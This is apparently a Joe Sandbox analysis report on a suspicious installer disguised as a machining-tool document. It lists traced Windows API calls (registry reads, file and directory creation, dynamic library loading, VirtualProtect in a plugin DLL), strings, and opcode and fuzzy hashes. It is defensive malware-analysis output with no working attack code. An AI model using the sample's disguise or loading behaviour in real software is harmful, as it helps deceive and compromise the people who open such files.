                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2987980305-0
                                                                                                                                                                                                                          • Opcode ID: 3b081aef81ff629f146bbe59bed4ce20841918d67cbec0e6b9b54e24ec9e4470
                                                                                                                                                                                                                          • Instruction ID: b68841798668a23a4ff443840be3121a405d120f2a8fc72f381fb15ba3c401f2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b081aef81ff629f146bbe59bed4ce20841918d67cbec0e6b9b54e24ec9e4470
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72212E72904215FBDF217F648E4DA6E7670AB45318F30423BF301B52D0D7BD49419A6E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405808: CharNextA.USER32(?,?,Unconsiderately97.gra,?,00405874,Unconsiderately97.gra,Unconsiderately97.gra,766B3410,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405816
                                                                                                                                                                                                                            • Part of subcall function 00405808: CharNextA.USER32(00000000), ref: 0040581B
                                                                                                                                                                                                                            • Part of subcall function 00405808: CharNextA.USER32(00000000), ref: 0040582F
                                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                                                                                                                                            • Part of subcall function 004053DC: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040541F
                                                                                                                                                                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs,00000000,00000000,000000F0), ref: 00401634
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs, xrefs: 00401629
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                          • String ID: C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs
                                                                                                                                                                                                                          • API String ID: 1892508949-893828937
                                                                                                                                                                                                                          • Opcode ID: 74df2cec2f7f2bbddf3b219624da823990b40f00be921dfed867a10567afae30
                                                                                                                                                                                                                          • Instruction ID: 033a10bc0c18a89e8a0df43fa9022a024a55b03552da94b7695e97ed969a6887
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74df2cec2f7f2bbddf3b219624da823990b40f00be921dfed867a10567afae30
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD112B35504141ABDF217B650C409BF37B0E9A2325738463FE582B22D2C63C0943A63F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6f303b90f097451caafc5c82d86dc7f8c3a5ca7b8ce6b4562ff9062d076474e9
                                                                                                                                                                                                                          • Instruction ID: cf83b5f92aa564cc298776c77b2bdd28f1825052710f2ecdbdb4cfcb1c159722
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f303b90f097451caafc5c82d86dc7f8c3a5ca7b8ce6b4562ff9062d076474e9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92A13171E00229CBDF28DFA8C8547ADBBB1FB44305F11816ED816BB281C7786A96CF44
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 1ab636e1636351d1357f15bb4f6043d343d203a0e7e05c7e50cd2d20e4a1f53c
                                                                                                                                                                                                                          • Instruction ID: cdde4d58dff4e4a9c83cf0d0e57cddb7afde41a65112cf45587a3a44971c93cd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ab636e1636351d1357f15bb4f6043d343d203a0e7e05c7e50cd2d20e4a1f53c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A911070E04228CBDF28DF98C8547ADBBB1FB44305F15816ED816BB281C778AA96DF44
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
APIs
  • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000001FC,00000000,00000022,00000000,?,?), ref: 00402B6C
• RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
• RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024C3
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz3421.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Enum$CloseOpenValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 167947723-0
                                                                                                                                                                                                                          • Opcode ID: 677bdc88bce3e1e7e8eb01a68c937f1af1addeb258e3eaebf081c5251f1331a7
                                                                                                                                                                                                                          • Instruction ID: e09e8e067f2b8771eb66943483239aed03eb61d96520190a1401bf15a77a7747
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 677bdc88bce3e1e7e8eb01a68c937f1af1addeb258e3eaebf081c5251f1331a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BAF0AD72A04200BFEB11AF659E88EBB7A6DEB80344B10443AF505A61C0D6B84A459A7A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000), ref: 100028A7
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 100029AE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1507773811.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507731690.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507814859.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507849586.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateErrorFileLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1214770103-0
                                                                                                                                                                                                                          • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                                                                                                                                                          • Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000001FC,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                                                                                                                          • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 00402440
                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz3421.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                                          • Opcode ID: 3d06c792d204b5780c99020f1df9334d27262dd1fda640259017b7665588fed0
                                                                                                                                                                                                                          • Instruction ID: e2c7ba43779b99907ab4ed3cb5240aedb23d0abedd6968282b04b845729cd546
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d06c792d204b5780c99020f1df9334d27262dd1fda640259017b7665588fed0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7119471905205EEDF14DF64C6889AEBBB4EF11349F20843FE542B62C0D2B84A45DA5A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                          • Opcode ID: f500664b12d1a9ca3d846aae4db6b5f226f7dec665eeac70e15b2afbb9a011de
                                                                                                                                                                                                                          • Instruction ID: f7ce4a596c66e03a629b41503ee4a79f45406b0749a56119d0920da1f960bb93
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f500664b12d1a9ca3d846aae4db6b5f226f7dec665eeac70e15b2afbb9a011de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E01F431B24210ABE7194B389E04B6A37A8E710314F11823BF911F66F1D7B8DC42AB4D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A16
                                                                                                                                                                                                                          • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A29
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnvironmentExpandStringslstrcmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1938659011-0
                                                                                                                                                                                                                          • Opcode ID: bcf3e9f808a92abb008fcd91cfb6478f52e8b1f94631290f685fc1eff8d8e701
                                                                                                                                                                                                                          • Instruction ID: bf6bb96d0a63331738c2685f3a3f780ebf23ad7b4ccd19b8e98b90d3cb04d7dd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcf3e9f808a92abb008fcd91cfb6478f52e8b1f94631290f685fc1eff8d8e701
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BAF08C72B06241EBDB20DF669C08B9B7EA8EFA1355B10803BF145F2190D2388502DB2D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ShowWindow.USER32(00010446), ref: 00401579
                                                                                                                                                                                                                          • ShowWindow.USER32(00010440), ref: 0040158E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ShowWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1268545403-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060A4
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                                                                                                                                                                                                            • Part of subcall function 00406028: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603F
                                                                                                                                                                                                                            • Part of subcall function 00406028: wsprintfA.USER32 ref: 00406078
                                                                                                                                                                                                                            • Part of subcall function 00406028: LoadLibraryA.KERNELBASE(?), ref: 00406088
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,80000000,00000003), ref: 00405974
                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405996
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(?,?,00405563,?,?,00000000,00405746,?,?,?,?), ref: 00405950
                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405964
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(?,00000000,004030CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 0040545F
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040546D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 390214022-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(00000000,000001FC,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,0040305C,00000000,0040A8D8,00000020,0040A8D8,00000020,000000FF,00000004,00000000), ref: 00405A2B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040308E,00000000,00000000,00402EEB,000000FF,00000004,00000000,00000000,00000000), ref: 004059FC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1507773811.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507731690.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507814859.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507849586.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022FA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileString
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1096422788-0
                                                                                                                                                                                                                          • Opcode ID: 3f00b4a3684e1b502d57278d27361b2c9c5ffa269ab71a706c43388532d59aa2
                                                                                                                                                                                                                          • Instruction ID: 0f0d0afc6be0f3d5bf6976507d7aeec6b8dca919a9a5ba2fd125b200ef34e9dc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f00b4a3684e1b502d57278d27361b2c9c5ffa269ab71a706c43388532d59aa2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9E08630A04214BFDB20EFA08D09BAE3669BF11714F10403AF9917B0D2EAB889419B1D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
